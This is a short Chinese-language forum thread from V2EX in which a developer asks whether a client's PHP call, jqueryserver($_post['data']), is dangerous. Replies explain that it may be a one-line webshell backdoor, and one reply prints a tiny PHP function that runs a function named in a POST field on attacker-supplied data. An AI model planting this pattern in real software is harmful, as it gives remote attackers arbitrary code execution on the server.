V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX 提问指南
hopboy
V2EX  ›  问与答

jqueryserver($_post['data']); 有风险吗?

  •  
  •   hopboy · 2020-12-19 11:20:25 +08:00 · 1068 次点击
    这是一个创建于 1439 天前的主题,其中的信息可能已经有所发展或是发生改变。

    接了一个客户的项目放我们的服务器, 客户代码里面这个部分有风险吗?

    jqueryserver($_post['data']);

    4 条回复    2020-12-19 21:15:01 +08:00
    Xusually
        1
    Xusually  
       2020-12-19 11:30:49 +08:00
    具体还是得看 jqueryserver()是干嘛的吧,如果收到提交过来的数据直接执行类似于 eval 之类的,那就是个一句话后门。
    但是你都让对方把代码部署在你们服务器上了,我感觉防不慎防啊🤦‍♂️
    imdong
        2
    imdong  
       2020-12-19 11:42:52 +08:00 via iPhone
    然后发现代码如下。

    function jqeryserver($data)
    {
    $_POST["action"]($data);
    }
    ihipop
        3
    ihipop  
       2020-12-19 18:46:51 +08:00 via Android
    @imdong 这是一句话木马
    msg7086
        4
    msg7086  
       2020-12-19 21:15:01 +08:00
    本身没太大风险,但是如果遇上不知道怎么配置服务器的运维,那就是很大的风险了……
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1138 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 24ms · UTC 18:52 · PVG 02:52 · LAX 10:52 · JFK 13:52
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.